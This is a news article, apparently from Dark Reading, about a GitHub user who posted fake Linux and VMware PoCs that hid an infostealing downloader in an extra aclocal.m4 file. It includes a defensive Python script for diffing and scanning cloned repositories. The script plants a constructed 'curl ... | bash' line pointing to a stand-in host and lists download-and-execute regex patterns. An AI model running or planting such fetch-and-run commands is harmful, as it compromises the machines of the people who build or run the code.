Linux Hacker Exploits Researchers with Fake PoCs Posted to GitHub
A cyber attacker gives defenders a taste of their own medicine, with GitHub honeypots concealing infostealers.
July 14, 2023
A GitHub user managed to dupe security researchers by publishing fake proofs-of-concept (PoCs) containing Linux backdoors.
Cybersecurity researchers use PoCs to test and better understand publicly known vulnerabilities. They are essential and ubiquitous, which, perhaps, makes it easier for a bad one to slip through.
Researchers from Uptycs this week outed a GitHub user (now deactivated) who copied legitimate PoCs for known vulnerabilities, reposting them with hidden Linux-built infostealing malware. One of the two fake PoCs had already been forked 25 times at the time of discovery; a second copy has been forked 20 times.
Siddartha Malladi, security researcher at Uptycs, doesn't blame the victims for the egg on their face. "On any bad day, I just might not check every detail," he says about this kind of trap. "I'm not efficient enough to check every line of code every day, right?"
Attackers Attacking Defenders
During regular testing for various common vulnerabilities, the Uptycs researchers came across a suspicious PoC. "On the surface, it appears to be an authentic demonstration, complete with strings that mimic genuine output," they wrote in their blog post, but running the code triggered "significant irregularities" in their system, including "unexpected network connections, unusual data transfers, and unauthorized system access attempts."
It turned out that what they'd downloaded was a GitHub entry masquerading as a PoC for CVE-2023-35829, a 7.0-rated "high" severity use-after-free vulnerability in the Linux kernel. The contents of the submission were, tellingly, copied almost bit-for-bit from a legitimate PoC for a different vulnerability in the Linux kernel, CVE-2022-34918. The only difference was an additional file — src/aclocal.m4 — acting as a downloader for a Linux bash script. The script contains a backdoor that collects information about the host machine, such as the hostname, the username, and a list of home directory contents.
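Because the fake PoC differed from the legitimate CVE-2022-34918 PoC only by one extra file, a file-level comparison against the original repository would have surfaced it before anything was run. The script below is an added, defender-side example written for this article; it is not code from Uptycs, GitHub, or either PoC. It builds a trusted PoC tree and a cloned copy with a planted src/aclocal.m4 (both constructed sample data), reports added, missing and changed files, and then scans the candidate tree for download-and-execute patterns that a genuine autotools macro file would never contain. The regex list is a heuristic of our own, and the constructed file's contents are not what the real downloader contained.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic markers of "fetch something from the network and run it".
# These are an assumption for the demo, not the real script's contents.
DOWNLOAD_EXEC_PATTERNS = [
    re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),   # curl ... | sh
    re.compile(r"\b(curl|wget)\b.*\b(chmod\s+\+x|\./)"),   # fetch, then execute
    re.compile(r"\bbase64\s+(-d|--decode)\b"),            # decode a hidden payload
]


def file_hashes(root: Path) -> dict:
    """Map relative path -> sha256 hex digest for every regular file under root."""
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            result[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return result


def compare_to_baseline(trusted: Path, candidate: Path) -> dict:
    """Files added, missing or changed in candidate relative to the trusted copy."""
    base = file_hashes(trusted)
    cand = file_hashes(candidate)
    return {
        "added": sorted(set(cand) - set(base)),
        "missing": sorted(set(base) - set(cand)),
        "changed": sorted(p for p in base.keys() & cand.keys() if base[p] != cand[p]),
    }


def scan_for_downloaders(root: Path) -> list:
    """Return (relative path, matched pattern) for files hitting a download-and-execute heuristic."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        for pat in DOWNLOAD_EXEC_PATTERNS:
            if pat.search(text):
                hits.append((path.relative_to(root).as_posix(), pat.pattern))
                break  # one hit per file is enough to flag it
    return hits


def build_demo() -> tuple:
    """Construct a trusted PoC tree and a clone that adds src/aclocal.m4 (constructed sample data)."""
    base = Path(tempfile.mkdtemp())
    trusted = base / "trusted_poc"
    cloned = base / "cloned_poc"
    for d in (trusted, cloned):
        (d / "src").mkdir(parents=True)
        (d / "Makefile").write_text("all:\n\tgcc -o exploit src/exploit.c\n")
        (d / "src" / "exploit.c").write_text("int main(void){return 0;}\n")
    # The planted file: looks like an autotools macro file but fetches and runs a script.
    # Hostname is the reserved .invalid TLD; this is a constructed stand-in, not the real downloader.
    (cloned / "src" / "aclocal.m4").write_text(
        "dnl autoconf helper macros\n"
        "curl -s http://example.invalid/s.sh | bash\n"
    )
    return trusted, cloned


def audit(trusted: Path, candidate: Path) -> dict:
    """Combine the baseline diff with the downloader scan into one report."""
    report = compare_to_baseline(trusted, candidate)
    report["downloaders"] = scan_for_downloaders(candidate)
    return report


if __name__ == "__main__":
    t, c = build_demo()
    for key, value in audit(t, c).items():
        print(f"{key}: {value}")
```

In practice the trusted side would be a checkout of the original PoC at a known commit; the diff then catches exactly the "one extra file" trick described above, and the pattern scan is a second, independent check for repositories that have no upstream to compare against. Both are meant to run before the PoC is executed, and only inside a disposable virtual machine.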
The same profile behind that first malicious PoC also published one more, pertaining to CVE-2023-20871, a 7.8 "high" severity privilege escalation vulnerability in the VMware Fusion hypervisor. In everything but name, this second honeypot was identical to the first.
The mastermind behind all of this is GitHub user ChriSanders22. The profile appears to have stolen its bio from another GitHub user, and its profile picture depicts the chess grandmaster Shakhriyar Mamedyarov. Malladi was able to connect the profile with a user on chess.com from the Philippines.
The profile and its malicious PoCs have since been deleted. A GitHub spokesperson informed Dark Reading, "We removed the content in accordance with GitHub's Acceptable Use Policies, which prohibit posting content that directly supports unlawful active attack or malware campaigns that are causing technical harms."
A copied version of the fake CVE-2023-35829 PoC is still live. It has been forked 20 times.
What Security Pros Can Do
Neoteric as PoC poisoning may be, hackers have been known to impersonate researchers before. They might do it just to prove that they can, or to learn more about their adversaries. Or, Malladi posits, they might want to steal researchers' powerful software tools.
Meanwhile, there's not much that repositories can do to prevent this particular brand of phishing, even when a fake PoC obviously overlaps with a legitimate one. Malladi posits a hypothetical college course, where beginner students are assigned to code a "hello, world" program in Python, then publish it to GitHub. The same code could be published by dozens of new accounts, "but what can they do? It is a legit thing. That's the problem — even if copying can be detected, the admins cannot do anything about it."
And so, cybersecurity professionals are going to have to walk the walk — engaging with cyberspace with the same caution and preparedness they expect of their clients, by always testing in a virtual environment.
"We've definitely seen these types of attacks before," Malladi emphasizes. "I want people to understand that this is not stopping in the future."